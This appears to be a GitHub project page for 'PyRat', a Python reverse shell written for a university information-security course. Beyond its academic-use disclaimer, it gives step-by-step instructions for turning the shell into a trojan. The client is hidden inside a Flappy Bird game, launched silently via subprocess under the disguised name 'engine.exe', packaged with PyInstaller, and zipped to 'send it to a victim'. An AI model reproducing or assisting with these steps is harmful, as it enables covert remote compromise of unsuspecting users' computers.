PyRat

A Simple Python 3 Reverse Shell Script

View on GitHub

PyRat: ReverseShell

A Fully Undetectable Python 3 Reverse Shell Script

Disclaimer

Developed by Gerard Ian M. Balaoro
In Partial Fulfillment on the Requirements for the Subject
LIS 198: Information Security
1st Semester, A.Y. 2018-2019
University of the Philippines Diliman

The author intended this to be used solely for academic purposes

Usage

Building Binaries Using PyInstaller (Windows)

Building Trojan Executables (Windows)

Injecting the client script inside the parent entry script.

It’s faily easy to integrate this script to any Python application. In this example, we will use this Flappy Bird Game recreated by Sourabh Verma using the PyGame library.

All we need to do is execute the client script silently whenever the game is initialized. We also need to think of an unsuspicous name to use when compiling the client script, in this case, we’re using ‘engine.exe’. This can be accomplished using Python’s subprocess library:

import subprocess
payload = subprocess.Popen('engine', shell = True, stdout= None, stderr = None, stdin = None)

Building the Game Package

Run pyinstaller and copy the assets folder to the destination:

pyinstaller flappy.py -F -y -i assets/icons/flappy.ico --distpath "dist/FlappyBird" --name "flappybird" --windowed
xcopy "assets" "dist/FlappyBird/assets" /E /S /Y

Once done, we can now see our Trojan application inside the build/FlappyBird directory. All there’s left to do is to change the configuration settings, compress this to a zip file and send it to a victim.

.
├── ...
├── config.ini  # Server settings
├── engine.exe  # Concealed payload
├── flappybird.exe 
└── ...

Credits